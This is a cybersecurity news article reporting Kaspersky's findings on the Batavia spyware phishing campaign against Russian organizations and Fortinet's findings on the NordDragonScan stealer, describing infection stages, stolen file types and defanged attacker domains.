In a series of targeted cyberattacks that began in July 2024, Russian organizations have been infiltrated by a previously unidentified Windows spyware known as Batavia. Cybersecurity firm Kaspersky has been monitoring this campaign, which employs sophisticated phishing tactics to compromise systems and exfiltrate sensitive documents.
Initial Attack Vector: Phishing Emails
The attackers initiate their campaign by sending deceptive emails from the domain oblast-ru[.]com, which they control. These emails, crafted to appear as legitimate contract communications, contain malicious links leading to the download of an archive file. Within this archive resides a Visual Basic Encoded script (.VBE) file. When executed, this script profiles the victim’s system and transmits the gathered information to a remote server. Subsequently, the script downloads a Delphi-based executable, marking the next phase of the infection.
Malware Capabilities and Data Exfiltration
Once the Delphi executable is active, it likely presents a counterfeit contract document to the user, serving as a distraction while it operates covertly. In the background, the malware collects a variety of data, including system logs, office documents (such as .doc, .docx, .ods, .odt, .pdf, .xls, and .xlsx files), and screenshots. It also scans removable devices connected to the system for additional data.
The malware’s functionality extends further by downloading an additional binary from the attacker’s server. This new component broadens the scope of targeted file types to include images, emails, PowerPoint presentations, archive files, and text documents (specifically .jpeg, .jpg, .cdr, .csv, .eml, .ppt, .pptx, .odp, .rar, .zip, .rtf, and .txt files). The exfiltrated data is then transmitted to a different domain, ru-exchange[.]com, from which another executable is downloaded, indicating a multi-stage attack designed for prolonged espionage.
Scope and Impact
Kaspersky’s telemetry data reveals that over the past year, more than 100 users across several dozen organizations have received these phishing emails. The primary objective of the Batavia spyware is to steal internal documents and gather comprehensive system information, including lists of installed programs, drivers, and operating system components.
Broader Context: Similar Threats
This discovery aligns with other recent findings in the cybersecurity landscape. For instance, Fortinet FortiGuard Labs identified a campaign delivering a Windows stealer malware named NordDragonScan. While the exact method of initial infection remains unclear, it is believed to involve phishing emails containing links that lead to the download of a RAR archive. This archive includes a Windows shortcut (LNK) file that uses mshta.exe to execute a remotely hosted HTML Application (HTA). This process results in the display of a benign decoy document while a malicious .NET payload is silently installed.
Once installed, NordDragonScan connects to a remote server (kpuszkiev[.]com), establishes persistence through Windows Registry modifications, and conducts extensive reconnaissance of the compromised system. It collects sensitive data, including entire Chrome and Firefox profiles, documents, and screenshots, which are then exfiltrated back to the attacker’s server via an HTTP POST request.
Conclusion
The emergence of Batavia and similar malware underscores the evolving sophistication of cyber threats targeting organizations. These campaigns highlight the critical need for robust cybersecurity measures, including employee education on phishing tactics, regular system monitoring, and the implementation of advanced threat detection solutions to mitigate the risk of such infiltrations.
